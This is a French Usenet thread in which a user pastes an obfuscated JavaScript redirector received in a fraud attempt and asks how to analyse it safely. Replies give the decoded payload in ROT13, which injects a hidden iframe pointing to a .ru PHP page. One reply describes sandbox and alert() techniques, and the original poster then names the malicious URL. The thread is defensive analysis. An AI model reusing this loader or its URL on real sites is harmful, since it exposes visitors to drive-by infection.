Message codé...

5 réponses
Avatar
nospam
Bonjour,


Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?






<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<title>You are redirecting</title>
</head>
<body>
<h1>Loading... Wait please...</h1><br>
</body>`

<script>if(window['d'+'o'+'c'+'u'+'m'+'e'+'nt'])aa=/\w/.exec(new
Date()).index+[];aaa='0';try{new
document();}catch(qqq){ss=String;}if(aa.indexOf(aaa)!==-1)f='-30!-30!66!63!-7!1!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!2!84!-30!-30!-30!66!63!75!58!70!62!75!1!2!20!-30!-30!86!-7!62!69!76!62!-7!84!-30!-30!-30!61!72!60!78!70!62!71!77!7!80!75!66!77!62!1!-5!21!66!63!75!58!70!62!-7!76!75!60!22!0!65!77!77!73!19!8!8!60!73!72!67!68!67!63!65!72!77!83!73!72!61!7!75!78!19!17!9!17!9!8!66!70!58!64!62!76!8!58!78!59!69!59!83!61!71!66!7!73!65!73!0!-7!80!66!61!77!65!22!0!10!9!0!-7!65!62!66!64!65!77!22!0!10!9!0!-7!76!77!82!69!62!22!0!79!66!76!66!59!66!69!66!77!82!19!65!66!61!61!62!71!20!73!72!76!66!77!66!72!71!19!58!59!76!72!69!78!77!62!20!69!62!63!77!19!9!20!77!72!73!19!9!20!0!23!21!8!66!63!75!58!70!62!23!-5!2!20!-30!-30!86!-30!-30!63!78!71!60!77!66!72!71!-7!66!63!75!58!70!62!75!1!2!84!-30!-30!-30!79!58!75!-7!63!-7!22!-7!61!72!60!78!70!62!71!77!7!60!75!62!58!77!62!30!69!62!70!62!71!77!1!0!66!63!75!58!70!62!0!2!20!63!7!76!62!77
!26!77!77!75!66!59!78!77!62!1!0!76!75!60!0!5!0!65!77!77!73!19!8!8!60!73!72!67!68!67!63!65!72!77!83!73!72!61!7!75!78!19!17!9!17!9!8!66!70!58!64!62!76!8!58!78!59!69!59!83!61!71!66!7!73!65!73!0!2!20!63!7!76!77!82!69!62!7!79!66!76!66!59!66!69!66!77!82!22!0!65!66!61!61!62!71!0!20!63!7!76!77!82!69!62!7!73!72!76!66!77!66!72!71!22!0!58!59!76!72!69!78!77!62!0!20!63!7!76!77!82!69!62!7!69!62!63!77!22!0!9!0!20!63!7!76!77!82!69!62!7!77!72!73!22!0!9!0!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!80!66!61!77!65!0!5!0!10!9!0!2!20!63!7!76!62!77!26!77!77!75!66!59!78!77!62!1!0!65!62!66!64!65!77!0!5!0!10!9!0!2!20!-30!-30!-30!61!72!60!78!70!62!71!77!7!64!62!77!30!69!62!70!62!71!77!76!27!82!45!58!64!39!58!70!62!1!0!59!72!61!82!0!2!52!9!54!7!58!73!73!62!71!61!28!65!66!69!61!1!63!2!20!-30!-30!86'.split('!');md='a';e=window['e'+'val'];w=f;s='';fr='f'+'ro'+'m'+'Char';r=ss[fr+'Code'];for(i=0;0>i-w.length;i++){j=i;s=s+r(39+1*w[j]);}if(aa.indexOf(aaa)!==-1)e(s);</script>
</html>

5 réponses

Avatar
yamo'
Salut,

Le 22/02/2012 15:57, a écrit:
Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?



J'ai regardé, l'extension faite par le développeur d'Adblock Plus ne
peut pas t'aider :
<https://addons.mozilla.org/en-US/seamonkey/addon/javascript-deobfuscator/>
/ <https://addons.mozilla.org/en-US/firefox/addon/javascript-deobfuscator/>

Une réponse à cette question est très intéressante!

Peut-être que sur fr.comp.securite tu auras une réponse même si c'est
limite hors charte...


--
Stéphane
Avatar
Pierre Maurette
:
Bonjour,


Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?



<ROT13>
vs(jvaqbj['q' + 'b' + 'p' + 'h' + 'z' + 'r' + 'ag'])
nn = /j/.rkrp(arj Qngr()).vaqrk + [];
nnn = '0';
gel {
arj qbphzrag();
} pngpu (ddd) {
ff = Fgevat;
}
vs(nn.vaqrkBs(nnn) !== -1)
s = '-30!...!86'.fcyvg('!');
zq = 'n';
r = jvaqbj['r' + 'iny'];
j = s;
f = '';
se = 's' + 'eb' + 'z' + 'Pune';
e = ff[se + 'Pbqr'];
sbe( v = 0; 0 > v - j.yratgu; v++) {
w = v;
f = f + e(39 + 1 * j[w]);
}
vs(nn.vaqrkBs(nnn) !== -1)
r(f);
</ROT13>


<ROT13>
vs(qbphzrag.trgRyrzragfOlGntAnzr('obql')[0]) {
vsenzre();
} ryfr {
qbphzrag.jevgr("<vsenzr
fep='uggc://pcbwxwsubgmcbq.eh:8080/vzntrf/nhoyomqav.cuc' jvqgu='10'
urvtug='10'
fglyr='ivfvovyvgl:uvqqra;cbfvgvba:nofbyhgr;yrsg:0;gbc:0;'></vsenzr>");
}
shapgvba vsenzre() {
ine s = qbphzrag.perngrRyrzrag('vsenzr');
s.frgNggevohgr('fep',
'uggc://pcbwxwsubgmcbq.eh:8080/vzntrf/nhoyomqav.cuc');
s.fglyr.ivfvovyvgl = 'uvqqra';
s.fglyr.cbfvgvba = 'nofbyhgr';
s.fglyr.yrsg = '0';
s.fglyr.gbc = '0';
s.frgNggevohgr('jvqgu', '10');
s.frgNggevohgr('urvtug', '10');
qbphzrag.trgRyrzragfOlGntAnzr('obql')[0].nccraqPuvyq(s);
}
</ROT13>

--
Pierre Maurette
Avatar
Pierre Maurette
:
Bonjour,


Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?



Je vous avais proposé une réponse un peu travaillée, malheureusement
/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
mis du code en ROT13 dans un autre message. Le premier est votre code
mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
Des outils, à cumuler éventuellement selon son niveau de paranoïa:
travailler dans un /bac à sable/, utiliser un éditeur de code qui sait
formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu
de jugeote et modifier le code. Ici c'est la dernière ligne qui fait
tout, e(s); où e est une fonction et s une chaîne, vous pouvez la
remplacer par alert(e); alert(s);
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
juste une vague idée de la syntaxe, ni en profondeur les mécanismes
sous-jacents, mais je suis loin d'être convaincu que l'URL de la
/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
faudrait plutôt voir la tripaille entourant le message, entêtes par
exemple.

--
Pierre Maurette
Avatar
Pierre Maurette
(supersedes )

:
Bonjour,


Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?



Je vous avais proposé une réponse un peu travaillée, malheureusement
/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
mis du code en ROT13 dans un autre message. Le premier est votre code
mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
second le code qui sera eval-ué() dans e(s);, donc la chaîne s.
Des outils, à cumuler éventuellement selon son niveau de paranoïa:
travailler dans un /bac à sable/, utiliser un éditeur de code qui sait
formater, utiliser Firebug voire Firebug + le debugger d'Aptana, un peu
de jugeote et modifier le code. Ici c'est la dernière ligne qui fait
tout, e(s); où e est une fonction et s une chaîne, vous pouvez la
remplacer par alert(e); alert(s);
Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
juste une vague idée de la syntaxe, ni en profondeur les mécanismes
sous-jacents, mais je suis loin d'être convaincu que l'URL de la
/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
faudrait plutôt voir la tripaille entourant le message, entêtes par
exemple.

--
Pierre Maurette
Avatar
nospam
Le Thu, 23 Feb 2012 07:49:18 +0100, Pierre Maurette
écrivait dans
fr.comp.infosystemes.www.auteurs:

(supersedes )

:
Bonjour,


Comment savoir sans danger ce que fait le script suivant, reçu dans
une tentative de fraude ? Je sais que c'est un piège, mais y a-t-il
une façon simple de connaître par exemple l'URL pour envoyer un
avertissement au site sans doute piraté vers lequel mène ce script ?



Je vous avais proposé une réponse un peu travaillée, malheureusement
/Microsoft Security Essentials/ n'a pas aimé du tout. Je vous ai donc
mis du code en ROT13 dans un autre message. Le premier est votre code
mis en forme (sans le gros tableau d'entiers séparés par des '!'), le
second le code qui sera eval-ué() dans e(s);, donc la chaîne s.



L'URL serait http://cpojkjfhotzpod.ru:8080/images/aublbzdni.php
et en russe, cela ne veut rien dire selon le traducteur de Google.
Par contre, la page existe.

[...]

Ici ce n'est pas violemment obfusqué. Je ne connais pas Javascript,
juste une vague idée de la syntaxe, ni en profondeur les mécanismes
sous-jacents, mais je suis loin d'être convaincu que l'URL de la
/victime/ apparaisse dans ce message ni dans le code reconstitué. Il
faudrait plutôt voir la tripaille entourant le message, entêtes par
exemple.



Victime d'un pirate qui aurait installé du code dangereux sur ce
serveur. Mais c'est peut-être bien le pirate, avec un tel code !

J'ai regardé la page avec un proxy et il y a là aussi du code
obscure, du java et sans doute du javascript. Disons que cela ne sent
pas bon et qu'il vaut mieux ne pas s'y frotter de trop près !